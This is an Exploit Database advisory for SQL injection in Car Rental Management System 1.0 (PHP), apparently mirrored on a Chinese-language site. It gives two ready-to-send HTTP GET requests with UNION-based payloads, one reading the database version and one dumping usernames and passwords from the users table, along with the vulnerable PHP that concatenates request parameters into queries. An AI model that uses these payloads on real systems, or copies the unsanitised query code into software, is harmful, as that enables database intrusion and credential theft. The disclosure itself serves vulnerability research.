Car Rental Management System 1.0 – ‘car_id’ Sql Injection

• Exploit Database
• 17 阅读

• 作者： Mehmet Kelepçe
  日期： 2020-11-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49056/

• # Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection
  # Date: 2020-11.13
  # Exploit Author: Mehmet Kelepçe / Gais Cyber Security
  # Author ID: 8763
  # Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
  # Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
  # Version: 1.0
  # Tested on: Apache2 - Windows 10
  
  Vulnerable param: car_id
  -------------------------------------------------------------------------
  GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Connection: close
  Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
  Upgrade-Insecure-Requests: 1
  Cache-Control: max-age=0
  
  
  Source Code:
  
  booking.php:
  --------------------------------------------------------------------
  <?php
  $qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);
  foreach($qry->fetch_array() as $k => $val){
  $$k=$val;
  }
  
  Vulnerable param: id
  -------------------------------------------------------------------------
  GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Connection: close
  Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
  Upgrade-Insecure-Requests: 1
  Cache-Control: max-age=0
  
  
  Source Code:
  
  view_car.php:
  --------------------------------------------------------------------
  <?php
  if(isset($_GET['id'])){
  if(isset($_GET['id'])){
  $qry = $conn->query("SELECT * FROM cars where id= ".$_GET['id']);